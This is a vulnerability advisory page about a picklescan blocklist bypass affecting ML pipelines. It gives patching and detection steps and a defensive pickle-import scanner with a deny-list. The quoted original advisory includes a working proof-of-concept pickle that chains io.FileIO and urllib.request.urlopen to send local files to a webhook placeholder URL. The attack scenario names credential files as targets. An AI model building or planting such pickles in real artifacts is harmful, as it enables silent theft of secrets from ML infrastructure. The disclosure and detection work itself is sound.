picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.
What is the risk?
HIGH. The severity is amplified because the affected component is a security control itself, not just an application library — bypassing it silently degrades your entire pickle validation posture without raising alarms. Exploit complexity is low: a working PoC is public, requires no authentication, and chains two standard library modules that are unlikely to appear in RCE blocklists. AI/ML environments are uniquely exposed given the ubiquity of pickle for model and dataset serialization across training, fine-tuning, and serving pipelines.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.35 | 0.0.35 |
Do you use picklescan? You're affected.
How severe is it?
What should I do?
5 steps:
1. PATCH: Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan).
2. AUDIT: Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources.
3. MIGRATE: Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely.
4. NETWORK CONTROLS: Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes.
5. DETECT: Alert on outbound HTTP connections from processes performing model loading. Monitor for `io.FileIO` or `urllib.request` patterns in pickle scanning logs if running custom detection.
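The DETECT step can also be applied before load time rather than only to scanner logs. As an added example (not part of this advisory, and not picklescan's own code), the Python script below walks a pickle's opcode stream with the standard library's `pickletools`, lists every module/name the file would import, and flags the `io` / `urllib.request` primitives without ever unpickling anything. The deny-list, the module alias table, the `ScanResult` type and the two sample pickles are constructed for this example; the optional allowlist mode is the "accept known good" posture recommended under CWE-22 on this page, applied to pickle imports.

```python
import io
import pickle
import pickletools
from dataclasses import dataclass, field
from typing import Optional

# Constructed deny-list for this example (picklescan maintains its own list).
# It deliberately includes the two non-RCE primitives from the advisory's chain.
SUSPICIOUS_GLOBALS = {
    ("io", "FileIO"), ("io", "open"), ("builtins", "open"),
    ("urllib.request", "urlopen"), ("urllib.request", "Request"),
    ("os", "system"), ("subprocess", "Popen"), ("subprocess", "run"),
}
# C accelerator modules appear under private names in pickles ('_io.FileIO');
# fold them onto the public name before matching. Constructed alias table.
MODULE_ALIASES = {"__builtin__": "builtins", "__main__": "__main__"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
MEMO_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
MEMO_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def normalize_module(module: str) -> str:
    return MODULE_ALIASES.get(module, module.lstrip("_"))


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the pickle would import on load, in stream order.

    Walks the opcode stream with pickletools.genops, so the bytes are parsed
    but never unpickled. Covers protocol <=3 GLOBAL/INST and protocol 4+
    STACK_GLOBAL, including module/name strings fetched back from the memo.
    """
    found: list[tuple[str, str]] = []
    strings: list[str] = []        # str values pushed so far, in order
    memo: dict[int, object] = {}   # memo slot -> str we saw stored there, or None
    top = None                     # top-of-stack value, if it is a str we tracked
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in ("GLOBAL", "INST"):   # pickletools renders the pair as "module name"
            module, attr = arg.split(" ", 1)
            found.append((module, attr))
            top = None
        elif name == "STACK_GLOBAL":     # pops name, then module, from the stack
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without module/name strings")
            found.append((strings[-2], strings[-1]))
            top = None
        elif name in STRING_OPS:
            strings.append(arg)
            top = arg
        elif name == "MEMOIZE":          # stores top-of-stack at the next free slot
            memo[len(memo)] = top
        elif name in MEMO_PUT_OPS:
            memo[arg] = top
        elif name in MEMO_GET_OPS:       # a memoized module string may be reused
            top = memo.get(arg)
            if isinstance(top, str):
                strings.append(top)
        else:                            # any other opcode leaves a non-str on top
            top = None
    return found


@dataclass
class ScanResult:
    imports: list[tuple[str, str]] = field(default_factory=list)
    flagged: list[tuple[str, str]] = field(default_factory=list)

    @property
    def clean(self) -> bool:
        return not self.flagged


def scan_bytes(data: bytes, allowlist: Optional[set[tuple[str, str]]] = None) -> ScanResult:
    """Flag imports on the deny-list, or, when an allowlist is given, flag
    every import that is not on it ("accept known good")."""
    result = ScanResult(imports=referenced_globals(data))
    for module, attr in result.imports:
        key = (normalize_module(module), attr)
        bad = key not in allowlist if allowlist is not None else key in SUSPICIOUS_GLOBALS
        if bad and key not in result.flagged:
            result.flagged.append(key)
    return result


class _FileReaderStub:
    """Constructed sample: reduces to io.FileIO, the first link of the
    advisory's chain. It is pickled here for scanning and never unpickled."""
    def __reduce__(self):
        return (io.FileIO, ("/etc/hosts", "r"))


BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2], "epoch": 3})  # constructed
SUSPICIOUS_PICKLE = pickle.dumps(_FileReaderStub())                # constructed

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PICKLE), ("suspicious", SUSPICIOUS_PICKLE)):
        r = scan_bytes(blob)
        print(f"{label}: imports={r.imports} flagged={r.flagged} clean={r.clean}")
```

Deny-list mode reproduces the weakness this advisory describes: it only catches primitives someone already thought to list. In a pipeline, pass an allowlist of the exact imports your framework's checkpoints legitimately contain and treat any other import as a reject, and keep egress filtering in place for the case where a file is loaded anyway.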
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-9726-w42j-3qjr?
picklescan is used as a security gate in ML pipelines to validate pickle files before loading — this vulnerability means that gate is bypassable, giving your team false confidence that pickle files are clean. Attackers can craft malicious pickles that exfiltrate `/etc/passwd` and other sensitive files via SSRF without triggering RCE-focused blocklists. Upgrade picklescan to 0.0.35 immediately and audit any pickle files scanned by earlier versions as potentially untrusted.
Is GHSA-9726-w42j-3qjr actively exploited?
No confirmed active exploitation of GHSA-9726-w42j-3qjr has been reported, but organizations should still patch proactively.
How to fix GHSA-9726-w42j-3qjr?
1. PATCH: Upgrade picklescan to >= 0.0.35 immediately across all environments (pip install --upgrade picklescan). 2. AUDIT: Treat all pickle files scanned by picklescan < 0.0.35 as unverified; re-scan with the patched version or reload from trusted sources. 3. MIGRATE: Prefer safer serialization formats — safetensors for model weights, Parquet/Arrow for datasets — that eliminate pickle deserialization risk entirely. 4. NETWORK CONTROLS: Enforce egress filtering on model-loading workers to block unexpected outbound HTTP/HTTPS, which would mitigate the SSRF exfiltration leg even if a malicious pickle executes. 5. DETECT: Alert on outbound HTTP connections from processes performing model loading. Monitor for `io.FileIO` or `urllib.request` patterns in pickle scanning logs if running custom detection.
What systems are affected by GHSA-9726-w42j-3qjr?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data preprocessing pipelines.
What is the CVSS score for GHSA-9726-w42j-3qjr?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0011.000 Unsafe AI Artifacts
- AML.T0025 Exfiltration via Cyber Means
- AML.T0037 Data from Local System
- AML.T0107 Exploitation for Defense Evasion
Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

### Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

1. io.FileIO: Opens local files without using builtins.open.
2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

### PoC

```python
import pickle, io, urllib.request


class GetFile:
    # Reduces to an io.FileIO call, so no builtins.open appears in the pickle
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))


class Exfiltrate:
    # Reduces to urlopen with the FileIO object as the POST body
    def __reduce__(self):
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))


with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)
```

![Screenshot 2025-12-30 at 10 13 14 PM](https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994)

### Impact

- Arbitrary file read

Thanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE`-kind vulnerabilities, and that adding `File IO`, `Http` or any protocol-based detection may cause a lot of noise, feel free to close this issue.
Exploitation Scenario
An adversary targets an organization's model hub or shared ML artifact repository. They upload a poisoned model checkpoint serialized as a malicious pickle using the PoC technique — chaining `io.FileIO('/etc/passwd', 'r')` as the body of a `urllib.request.urlopen` POST to an attacker-controlled webhook. The organization's CI/CD pipeline runs picklescan (< 0.0.35) on incoming artifacts; the file passes as clean because it contains no `os.system`, `exec`, or other RCE-pattern opcodes. A downstream data scientist or automated pipeline loads the checkpoint into a training job. At deserialization, the server streams its `/etc/passwd` — or more critically, cloud credential files like `~/.aws/credentials` or mounted secrets — directly to the attacker's server, all before any model code executes.
Weaknesses (CWE)
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Primary
CWE-918 Server-Side Request Forgery (SSRF)
Primary
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
- CVE-2026-3490 (10.0) picklescan: blocklist bypass enables full RCE (same package: picklescan)
- GHSA-vvpj-8cmc-gx39 (10.0) picklescan: security flaw enables exploitation (same package: picklescan)
- GHSA-g38g-8gr9-h9xp (9.8) picklescan: Allowlist Bypass evades input filtering (same package: picklescan)
- CVE-2025-1945 (9.8) picklescan: ZIP flag bypass enables RCE in PyTorch models (same package: picklescan)
- GHSA-7wx9-6375-f5wh (9.8) picklescan: Allowlist Bypass evades input filtering (same package: picklescan)